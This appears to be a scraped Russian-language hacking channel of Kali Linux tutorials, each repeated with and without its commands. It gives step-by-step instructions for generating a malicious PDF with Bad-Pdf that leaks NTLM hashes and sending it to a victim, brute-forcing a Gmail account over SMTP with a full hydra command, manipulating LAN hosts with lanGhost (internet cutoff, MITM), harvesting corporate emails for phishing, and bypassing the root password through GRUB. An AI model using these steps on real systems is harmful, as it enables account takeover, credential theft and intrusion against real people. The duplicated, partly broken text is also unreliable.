Как сбросить root пароль Kali Linux без аутентификации
Операционная система Linux спроектирована с ориентиром на максимальную безопасность, поэтому в ней у каждого пользователя есть пароль. Процессы аутентификации и смены пароля лежат на уровне системы.
Поэтому, если вы забыли root пароль на Kali Linux (либо вовсе никогда его и не знали), для начала необходимо запустить систему и дождаться открытия GNU GRUB.
Затем нужно нажать на 'E' тем самым открыв конфиг загрузчика.
В открывшимся окне нужно найти строку, которая начинается на
Откроется терминал. В нем нужно сначала перемонтировать систему на чтение-запись командой
◽
Потом просто вводим команду
◽
И прописываем два раза новый пароль. После подтверждения можно сделать перезапуск командой
◽
Готово! Новый пароль установлен.
#kali #хитрости
Операционная система Linux спроектирована с ориентиром на максимальную безопасность, поэтому в ней у каждого пользователя есть пароль. Процессы аутентификации и смены пароля лежат на уровне системы.
Поэтому, если вы забыли root пароль на Kali Linux (либо вовсе никогда его и не знали), для начала необходимо запустить систему и дождаться открытия GNU GRUB.
Затем нужно нажать на 'E' тем самым открыв конфиг загрузчика.
В открывшимся окне нужно найти строку, которая начинается на
linux /boot/vmlinuz-3.18. В конце неё нужно поставить пробел, вписать single init=/bin/bash и нажать F10.Откроется терминал. В нем нужно сначала перемонтировать систему на чтение-запись командой
◽
mount -rw -o remount /Потом просто вводим команду
◽
passwd rootИ прописываем два раза новый пароль. После подтверждения можно сделать перезапуск командой
◽
shutdown -h nowГотово! Новый пароль установлен.
#kali #хитрости
Заражаем PDF-файл
Опасные PDF уже научились распознавать некоторые популярные антивирусы. Но опять же, не все, и чтобы стопроцентно обезопасить открытие подобного файла, лучше использовать конверторы, к примеру, Dangerzone (подробнее о нем в следующих постах).
Для демонстрации метода заражения воспользуемся утилитой Bad-Pdf. Она создает вредоносный PDF и открывает для него сессию. То есть если кто-то откроет этот файл, злоумышленнику моментально придут NTML хеши.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий командой
◽
◽
Процесс создания вредоносного PDF максимально простой. Нужно только запустить скрипт
◽
#хакинг #kali
Опасные PDF уже научились распознавать некоторые популярные антивирусы. Но опять же, не все, и чтобы стопроцентно обезопасить открытие подобного файла, лучше использовать конверторы, к примеру, Dangerzone (подробнее о нем в следующих постах).
Для демонстрации метода заражения воспользуемся утилитой Bad-Pdf. Она создает вредоносный PDF и открывает для него сессию. То есть если кто-то откроет этот файл, злоумышленнику моментально придут NTML хеши.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий командой
◽
git clone https://github.com/deepzec/Bad-Pdf.git
Переходим в папку и ставим права на файл эксплоита командами◽
cd Bad-pdf/
◽chmod +x badpdf.py
ИспользованиеПроцесс создания вредоносного PDF максимально простой. Нужно только запустить скрипт
◽
python badpdf.py
В папке с программой создастся тот самый файл. Остается только отправить его потенциальной жертве. Что самое интересное, данный способ пока актуален для всех версий Adobe Acrobat.#хакинг #kali
Автоматизация OSINT
При проведении OSINT(разведки на основе открытых источников) для анализа безопасности определённой системы часто приходится использовать огромное количество различных ресурсов: whois лукапы, сканеры портов и т.д. Это особо неудобно при анализе большого количества систем.
Утилита Magnifier помогает справиться с подобной проблемой. Она представляет из себя сборник большого количества OSINT инструментов. В одном окне терминала можно сканировать порты, узнавать расположение сервера, читать robots.txt и многое другое.
Установка
Скачиваем репозиторий с github
Переходим в папку и ставим права исполняемому файлу
Использование
Запускаем эксплоит командой
Далее перед нами откроется интуитивно понятное меню. Каждая функция соответствует цифре и после выполнения не завершает сам процесс Magnifier, что позволяет получив информацию от DNS Lookup, к примеру, мгновенно переходить к сканированию портов.
#kali #OSINT
При проведении OSINT(разведки на основе открытых источников) для анализа безопасности определённой системы часто приходится использовать огромное количество различных ресурсов: whois лукапы, сканеры портов и т.д. Это особо неудобно при анализе большого количества систем.
Утилита Magnifier помогает справиться с подобной проблемой. Она представляет из себя сборник большого количества OSINT инструментов. В одном окне терминала можно сканировать порты, узнавать расположение сервера, читать robots.txt и многое другое.
Установка
Скачиваем репозиторий с github
git clone https://github.com/TheEyeOfCyber/Magnifier.gitПереходим в папку и ставим права исполняемому файлу
cd Magnifierchmod +x magnifier.pyИспользование
Запускаем эксплоит командой
python2 magnifier.pyДалее перед нами откроется интуитивно понятное меню. Каждая функция соответствует цифре и после выполнения не завершает сам процесс Magnifier, что позволяет получив информацию от DNS Lookup, к примеру, мгновенно переходить к сканированию портов.
#kali #OSINT
Поиск скрытых директорий на вебресурсе
Неправильная конфигурация сайта ведет к многочисленным уязвимостям, которые могут привести к утечке данных пользователей. Подобные проблемы часто встречаются при использовании различных CMS, особенно старых версий.
Таким образом неправильно настроенный ресурс легко поддается фаззингу. Фаззинг - это техника тестирования ПО, основной задачей которой является поиск необходимой информации путем передачи различных случайных данных.
Конкретно Wscan ищет скрытые директории и файлы, последующий анализ которых поможет злоумышленнику обнаружить уязвимости.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽️
◽️
Стандартный фаззинг Wscan запускается в одну строчку
◽️
Когда процесс завершится в логах можно будет найти админку сайта, robot.txt, различные JS скрипты и т.д. Злоумышленнику остается только тщательно проанализировать их и в случае нахождения уязвимости начать атаку.
#хакинг #kali
Неправильная конфигурация сайта ведет к многочисленным уязвимостям, которые могут привести к утечке данных пользователей. Подобные проблемы часто встречаются при использовании различных CMS, особенно старых версий.
Таким образом неправильно настроенный ресурс легко поддается фаззингу. Фаззинг - это техника тестирования ПО, основной задачей которой является поиск необходимой информации путем передачи различных случайных данных.
Конкретно Wscan ищет скрытые директории и файлы, последующий анализ которых поможет злоумышленнику обнаружить уязвимости.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽️
git clone https://github.com/Testzero-wz/wscan.git
Переходим в папку и запускаем установщик◽️
cd wscan
◽️python3 -m pip install wscan
ИспользованиеСтандартный фаззинг Wscan запускается в одну строчку
◽️
wscan -u "http://www.example.com/" -f -m
Если вписать wscan --help и прочитать справку, можно узнать что вышепредставленная команда сканирует url по словарям, проверяет ссылки и строит карту сайта.Когда процесс завершится в логах можно будет найти админку сайта, robot.txt, различные JS скрипты и т.д. Злоумышленнику остается только тщательно проанализировать их и в случае нахождения уязвимости начать атаку.
#хакинг #kali
Поиск email адресов
Для социального инженера знание email сотрудника может быть основой для атаки на определенную организацию. Поэтому следует тщательно скрывать корпоративные почты или ограничивать прием сообщений на них с помощью фильтров, т.к. фишинговое письмо с подменой адреса отправителя неподготовленному пользователю идентифицировать сложно.
Для демонстрации поиска email адресов компании воспользуемся утилитой Samurai Email Discovery. Она способна искать по названию предприятия, доркам Google и домену.
Установка
Скачиваем репозиторий
◽️
◽️
◽️
Запускаем программу командой
◽️
#OSINT #kali
Для социального инженера знание email сотрудника может быть основой для атаки на определенную организацию. Поэтому следует тщательно скрывать корпоративные почты или ограничивать прием сообщений на них с помощью фильтров, т.к. фишинговое письмо с подменой адреса отправителя неподготовленному пользователю идентифицировать сложно.
Для демонстрации поиска email адресов компании воспользуемся утилитой Samurai Email Discovery. Она способна искать по названию предприятия, доркам Google и домену.
Установка
Скачиваем репозиторий
◽️
git clone https://github.com/0x3curity/Samurai
Далее нужно будет установить Lynx командой◽️
apt install lynx
И поставить права на исполняемый файл◽️
chmod +x samurai.sh
ИспользованиеЗапускаем программу командой
◽️
./samurai.sh
Перед нами появится меню, где можно будет выбрать тип поиска. Вводим соответствующую цифру, к примеру 3. Вводим название компании, и получаем список найденных корпоративных почт.#OSINT #kali
Проверка почты на предмет взлома
Инструмент PwnedOrNot позволяет узнать была ли ваша почта скомпрометирована. Апеллируя к базе из сотен утечек, скрипт пытается найти предоставленный ему email, и в случае подтверждения выдает все возможные вариации паролей.
Установка
Помимо Kali Linux, PwnedOrNot работает также и на Termux. Рассмотрим сначала установку на Kali, для этого нужно скачать репозиторий. Прописываем
◽️
◽️
◽️
◽️
◽️
PwnedOrNot максимально прост в использовании. Для начала процесса проверки запускаем скрипт командой
◽️
#kali #хакинг
Инструмент PwnedOrNot позволяет узнать была ли ваша почта скомпрометирована. Апеллируя к базе из сотен утечек, скрипт пытается найти предоставленный ему email, и в случае подтверждения выдает все возможные вариации паролей.
Установка
Помимо Kali Linux, PwnedOrNot работает также и на Termux. Рассмотрим сначала установку на Kali, для этого нужно скачать репозиторий. Прописываем
◽️
git clone https://github.com/thewhiteh4t/pwnedOrNot.git
Далее устанавливаем необходимый модуль Python◽️
pip install cfscrape
Готово. Для Termux установим для начала Python и Git◽️
pkg install python2
◽️pkg install git
Далее необходимые модули◽️
pip2 install requests
◽️pip2 install cfscrape
И в итоге скачаем репозиторий с github◽️
git clone https://github.com/thewhiteh4t/pwnedOrNot.git
ИспользованиеPwnedOrNot максимально прост в использовании. Для начала процесса проверки запускаем скрипт командой
◽️
python pwnedornot.py
Это как для Kali, так и для Termux. Далее остается только ввести почту и ждать завершения процесса. Если поиск пройдет удачно, в терминале появится список паролей, которые могут быть связаны со сканируемым адресом.#kali #хакинг
Сборник OSINT инструментов
Сборники инструментов предназначенных для определенного спектра атак давно стали основной составляющей базового набора для пентеста. Сюда можно добавить и фреймворк The Inspector, который включает в себя модули для получения информации о телефоне либо о домене, обхода CloudFlare и т.д.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽️
◽️
Запускаем The Inspector командой
◽️
#kali #OSINT
Сборники инструментов предназначенных для определенного спектра атак давно стали основной составляющей базового набора для пентеста. Сюда можно добавить и фреймворк The Inspector, который включает в себя модули для получения информации о телефоне либо о домене, обхода CloudFlare и т.д.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽️
git clone https://github.com/Moham3dRiahi/Th3inspector
Переходим в директорию с The Inspector, ставим права на установщик и запускаем его◽️
cd Th3inspector
◽️chmod +x install.sh && ./install.sh
ИспользованиеЗапускаем The Inspector командой
◽️
perl Th3inspector.pl
Теперь можно выбрать интересующую функцию, вписав её номер. К примеру для получения информации о сайте вводим 1 и потом домен. Как итог получаем списком данные геолокации хостера, ip и т.д.#kali #OSINT
Манипулирование компьютерами в локальной сети
Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации. Мало того многие атаки на корпорации не обходятся без распространения вредоносного ПО по локальной сети, поскольку проще взломать один ПК и через него получить доступ ко всем остальным.
Инструмент lanGhost создан как раз таки для управления локальной сетью. В его функционал входит: отключение интернета у целевого узла, замена всех картинок на веб-ресурсе, MITM и т.д. Реализация представляет собой программу на Python с панелью управления в виде бота Телеграм.
Установка
Устанавливаем Kali Linux.
Обновляем репозитории
◽️
◽️
◽️
◽️
Далее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali
Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации. Мало того многие атаки на корпорации не обходятся без распространения вредоносного ПО по локальной сети, поскольку проще взломать один ПК и через него получить доступ ко всем остальным.
Инструмент lanGhost создан как раз таки для управления локальной сетью. В его функционал входит: отключение интернета у целевого узла, замена всех картинок на веб-ресурсе, MITM и т.д. Реализация представляет собой программу на Python с панелью управления в виде бота Телеграм.
Установка
Устанавливаем Kali Linux.
Обновляем репозитории
◽️
apt-get update –y && apt-get upgrade –y && apt-get dist-upgrade
Устанавливаем Python 3◽️
apt-get install python3 python3-pip
Скачиваем репозиторий◽️
git clone https://github.com/xdavidhu/lanGhost
Переходим в директорию и запускаем установщик◽️
cd LanGhost/
◽️./setup.py
НастройкаДалее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali
Как создать свой сайт в сети TOR с помощью Kali Linux
Практически каждый знает о теневом браузере TOR, который защищает пользователей путем скрытия всех основных данных и открывает доступ к сайтам в доменной зоне .onion. Эти сайты в основном используются для незаконной деятельности, но помимо этого в списке вебресурсов даркнета можно также найти различные информационные форумы, библиотеки, оппозиционные порталы и т.д.
Как подключиться к такому сайту знают многие, но как он функционирует и как его создать не все. Разберем детально этот процесс.
Установка компонентов
Для начала потребуется установить старую версию Kali Linux, к примеру 1.0.6.
Далее устанавливаем и распаковываем Shallot
◽️
◽️
◽️
На данном этапе нужно сначала получить домен. Делается это командой
◽️
Далее запускаем Tor и lighttpd
◽️
◽️
◽️
Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные
◽️
#kali #TOR
Практически каждый знает о теневом браузере TOR, который защищает пользователей путем скрытия всех основных данных и открывает доступ к сайтам в доменной зоне .onion. Эти сайты в основном используются для незаконной деятельности, но помимо этого в списке вебресурсов даркнета можно также найти различные информационные форумы, библиотеки, оппозиционные порталы и т.д.
Как подключиться к такому сайту знают многие, но как он функционирует и как его создать не все. Разберем детально этот процесс.
Установка компонентов
Для начала потребуется установить старую версию Kali Linux, к примеру 1.0.6.
Далее устанавливаем и распаковываем Shallot
◽️
wget https://github.com/katmagic/Shallot/archive/master.zip
◽️unzip master.zip
Переходим в созданную директорию и запускаем сборку командами◽️
cd Shallot-master
◽️./configure
◽️make
Теперь установим непосредственно Tor и lighttpd◽️
apt-get install tor
◽️apt-get install lighttpd
НастройкаНа данном этапе нужно сначала получить домен. Делается это командой
◽️
./shallot ^codered
Создастся что-то на подобии coderedkpdsto4wxhr.onion и приватный ключ к нему. Вместо codered можно вставить любое название.Далее запускаем Tor и lighttpd
◽️
service tor start
◽️service lighttpd start
В файле /etc/tor/torrc нужно будет добавить такие строки◽️
HiddenServiceDir /var/lib/tor/hidden_service/
◽️HiddenServicePort 80 127.0.0.1:8080
В последней вместо локального ip можно внести внешний. Также желательно добавить эту строку◽️
ExcludeNodes {ru}, {ua}, {be}
Теперь по пути /var/lib/tor/hiddenservice в файл hostname нужно вписать полученный ранее домен, а в privatekey - приватный ключ.Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные
◽️
server.document-root = "/var/www/"
◽️server.error-handler-404 = "/404.html"
◽️server.tag = "Ваше значение"
◽️server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) }
◽️server.dir-listing = "disable"
Почти готово, нужно только создать вебстраницы index.html и 404.html в папке /var/www/, соответственно. Теперь при переходе по сгенерированному ранее адресу будет открываться созданный сайт. Стоит добавить, что в lighttpd можно уставить множество дополнительных модулей, тем самым модифицировать сайт.#kali #TOR
Взлом почты Gmail с помощью XHYDRA
Взлом почты особенно страшен тем, что через неё злоумышленник может восстановить доступ сразу к нескольким соцсетям пользователя. Поэтому лучше периодически проверять email на компрометацию в соответственных сервисах.
Сам процесс взлома может быть любым, от фишинга до брутфорса. О последнем сегодня речь и пойдет. Реализация атаки перебором для почтовых ящиков на протоколе smtp работает быстрее и стабильней, чем стандартные запросы на форму входа на сайте. Автоматизировать весь процесс будет утилита xHydra.
Использование xHydra
Поскольку xHydra уже предустановлена в Kali Linux шаг установки можно пропустить. Остается её запустить, выбрав в меню быстрого доступа "Password Attacks" раздел "Online Attacks" пункт "hydra-gtk" или просто прописав название программы в поиск.
Откроется графический интерфейс Hydra. Поскольку тестовую атаку будем проводить на адрес Gmail, то во вкладке "Target" в поля "Single Target", "Port Number" и "Protocol" вписываем значения
Теперь остается только перейти во вкладку "Start" и нажать одноименную кнопку. Перебрав все пароли из словаря Hydra выведет результат работы. Этот способ можно также реализовать с помощью команды
◽️
Взлом почты особенно страшен тем, что через неё злоумышленник может восстановить доступ сразу к нескольким соцсетям пользователя. Поэтому лучше периодически проверять email на компрометацию в соответственных сервисах.
Сам процесс взлома может быть любым, от фишинга до брутфорса. О последнем сегодня речь и пойдет. Реализация атаки перебором для почтовых ящиков на протоколе smtp работает быстрее и стабильней, чем стандартные запросы на форму входа на сайте. Автоматизировать весь процесс будет утилита xHydra.
Использование xHydra
Поскольку xHydra уже предустановлена в Kali Linux шаг установки можно пропустить. Остается её запустить, выбрав в меню быстрого доступа "Password Attacks" раздел "Online Attacks" пункт "hydra-gtk" или просто прописав название программы в поиск.
Откроется графический интерфейс Hydra. Поскольку тестовую атаку будем проводить на адрес Gmail, то во вкладке "Target" в поля "Single Target", "Port Number" и "Protocol" вписываем значения
smtp.gmail.com, 465 и smtp соответственно. Далее в разделе "Passwords" нужно указать логин атакуемого пользователя вписав его в пункт "Username". Логином выступает сама почта. В поле "Password List" нужно указать путь к словарю паролей.Теперь остается только перейти во вкладку "Start" и нажать одноименную кнопку. Перебрав все пароли из словаря Hydra выведет результат работы. Этот способ можно также реализовать с помощью команды
◽️
hydra -l <адрес gmail> -P <путь к словарю> -s 465 smtp.gmail.com smtp -v -V -f -t 1 -e nrs -S
#kali #хакинг